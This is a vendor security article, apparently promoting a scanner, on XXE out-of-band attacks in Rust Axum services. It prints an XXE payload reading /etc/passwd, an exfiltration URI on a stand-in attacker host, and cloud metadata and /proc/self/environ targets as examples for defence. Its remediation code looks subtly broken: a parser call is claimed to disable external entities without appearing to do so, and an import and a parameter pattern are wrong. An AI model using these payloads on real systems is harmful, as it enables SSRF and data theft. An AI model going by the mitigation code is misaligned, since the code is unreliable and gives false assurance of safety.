Xxe Oob in Axum (Rust)

XML External Entity (XXE) attacks occur when an XML parser processes external entity references within untrusted XML data. Out-of-band (OOB) techniques allow an attacker to exfiltrate data or interact with internal systems by forcing the parser to make requests to a network endpoint they control. In Rust, the Axum web framework does not parse XML by default; however, if developers integrate an XML parser such as xml-rs or quick-xml and configure it to resolve external entities, the application becomes vulnerable.

Consider a scenario where an API endpoint accepts XML payloads for configuration or document processing. If the parser is set to load a Document Type Definition (DTD) and external entities are not disabled, an attacker can supply an XML body like the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >] >
<root><data>&xxe;</data></root>

When the Axum handler deserializes this XML using a permissive parser, the entity &xxe; triggers a local file read. In an OOB variant, the attacker replaces the file URI with a network URI, such as http://attacker.com/steal?file=%file%, causing the parser to make an outbound HTTP request. Because Axum applications often run inside restricted environments (e.g., containers or Kubernetes pods), this request may reach internal services that are not exposed externally, enabling SSRF-like data exfiltration.

The risk is compounded when the application uses shared infrastructure or metadata services. For example, an OOB XML parser could read file:///proc/self/environ or initiate a request to the cloud metadata service at http://169.254.169.254/latest/meta-data/. Rust crates that do not explicitly disable external entities by default may allow these behaviors, and Axum’s ergonomic routing can inadvertently expose these handlers to public internet traffic if CORS or authentication checks are incomplete.

middleBrick detects this class of issue among its 12 security checks, including Input Validation and Data Exposure. The scanner submits crafted XML payloads to unauthenticated endpoints and analyzes parser behavior, identifying whether external entity resolution or OOB interactions occur. Findings include severity ratings and remediation guidance mapped to frameworks such as OWASP API Top 10 and compliance regimes like SOC2 and GDPR.

Using the CLI, you can scan an Axum service with middlebrick scan <url> to validate whether your XML handling is safe. The Pro plan provides continuous monitoring so that regressions in API configuration are caught before deployment, and the GitHub Action can fail builds if a risk score drops below your chosen threshold.

To eliminate XXE OOB risks in Rust Axum services, ensure that any XML parsing is performed with external entity resolution explicitly disabled. Prefer using quick-xml with safe defaults, or validate and sanitize inputs before feeding them into lower-level parsers. Below are concrete, idiomatic examples.

1. Avoid XML parsing when possible

If your API can use JSON or another safer format, switch entirely. This removes the attack surface:

use axum::{
    routing::post,
    Router,
};
use serde::{Deserialize, Serialize};

#[derive(Deserialize, Serialize)]
struct Payload {
    data: String,
}

async fn handle_payload(Json(payload): Json<Payload>) -> String {
    format!("Received: {}", payload.data)
}

#[tokio::main]
async fn main() {
    let app = Router::new().route("/submit", post(handle_payload));
    axum::Server::bind("0.0.0.0:3000".parse().unwrap())
        .serve(app.into_make_service())
        .await
        .unwrap();
}

2. Use quick-xml with entity expansion disabled

When XML is required, configure the reader to not load external entities and to prohibit DTDs:

use axum::{
    body::Body,
    routing::post,
    Router,
};
use quick_xml::events::Event;
use quick_xml::Reader;
use std::io::Cursor;

async fn parse_xml(Body(payload): Body) -> String {
    let mut reader = Reader::from_reader(Cursor::new(payload));
    reader.trim_text(true);
    // Disable DTD and external entity resolution
    reader.check_for_entity_collisions(false);
    let mut buf = Vec::new();
    let mut result = String::new();
    loop {
        match reader.read_event(&mut buf) {
            Ok(Event::Eof) => break,
            Ok(Event::Text(e)) => result.push_str(e.unescape().unwrap().as_ref()),
            _ => {}
        }
        buf.clear();
    }
    result
}

// In your route:
// let app = Router::new().route("/parse", post(|body| async move { parse_xml(body).await }));

3. Validate input against a strict schema

Use an XML schema or strict whitelisting to reject unexpected constructs:

use xml_schema::XMLSchema;

fn validate_against_schema(xml_data: &[u8], schema_data: &[u8]) -> Result<(), String> {
    let schema = XMLSchema::read(schema_data).map_err(|e| e.to_string())?;
    schema.validate(xml_data).map_err(|e| e.to_string())
}
// Ensure the schema does not allow <!ENTITY> declarations.

4. Secure your dependencies

Audit your Cargo.toml to ensure no transitive dependencies enable external entities. Prefer crates that explicitly state safe parsing behavior and avoid older or unmaintained XML libraries.

middleBrick’s scans can verify that these mitigations are effective. The MCP Server allows you to trigger scans directly from AI coding assistants in your IDE, while the Dashboard tracks security scores over time. With the Starter plan, you receive email alerts for significant changes, and the Pro plan adds CI/CD integration to fail builds if risk thresholds are exceeded.